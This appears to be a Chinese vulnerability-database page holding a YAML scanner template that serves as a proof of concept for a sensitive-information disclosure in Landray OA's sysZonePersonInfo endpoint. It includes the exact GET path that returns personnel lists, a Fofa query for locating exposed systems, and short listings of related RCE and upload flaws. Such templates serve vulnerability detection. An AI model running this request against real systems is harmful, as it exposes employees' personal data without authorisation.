landray-syszonepersoninfo-disclosure: 蓝凌OA sysZonePersonInfo 敏感信息泄露

漏洞描述

PoC代码[已公开]

id: landray-syszonepersoninfo-disclosure

info:
  name: 蓝凌OA sysZonePersonInfo 敏感信息泄露
  author: zan8in
  severity: high
  verified: true
  description: |-
    Fofa: app="Landray-OA系统"
  reference:
    - https://mp.weixin.qq.com/s/MWq2SWS04mm7caKHK2szZA
  tags: landray,disclosure
  created: 2024/02/29

rules:
  r0:
    request:
      method: GET
      path: /sys/zone/sys_zone_personInfo/sysZonePersonInfo.do?.js?&method=searchPerson&orderby&ordertype=up&rowsize=200&s_ajax=true
    expression: |
      response.status == 200 && 
      response.body.bcontains(b'"columns":') && 
      response.body.bcontains(b'"title":') && 
      response.body.bcontains(b'"property":') && 
      response.body.bcontains(b'"currentPage":') && 
      response.body.bcontains(b'"pageSize":')
expression: r0()

相关漏洞推荐

• 蓝凌OA erp_data.jsp存在远程命令执行漏洞 无POC

  2025-09-11 | 蓝凌OA
  蓝凌OA erp_data.jsp存在远程命令执行漏洞，攻击者可利用漏洞构造恶意请求，执行任意命令进而控制整个服务器。

• 蓝凌OA sysUiExtend.do 存在任意文件上传漏洞 无POC

  2025-09-11 | 蓝凌OA
  蓝凌OA sysUiExtend.do 存在任意文件上传漏洞，攻击者可以利用该漏洞上传恶意文件执行任意命令，进而控制整个服务器。

• landray-dataxml-jsp-rce: 蓝凌OA dataxml.jsp 远程命令执行漏洞 POC

  2025-09-01 | 蓝凌OA landray
  蓝凌OA dataxml.jsp 存在远程命令执行漏洞 FOFA：app="Landray-OA系统"

• LemonLDAP::NG 操作系统命令注入漏洞 无POC

  2025-09-20 00:03:21 | LemonLDAP::NG
  LemonLDAP::NG是LemonLDAP::NG开源的一套Web单点登录和访问管理软件。 LemonLDAP::NG 2.16.7之前版本和2.17版本至2.21.3之前版本存在操作系统命令注入...

• 万户OA informationmanager_upload.jsp 任意文件上传漏洞 无POC

  2025-09-19 | 万户OA
  万户OA存在任意文件上传漏洞，攻击者可以访问恶意链接使服务器下载恶意文件，从而达到上传文件目的，获取服务器权限。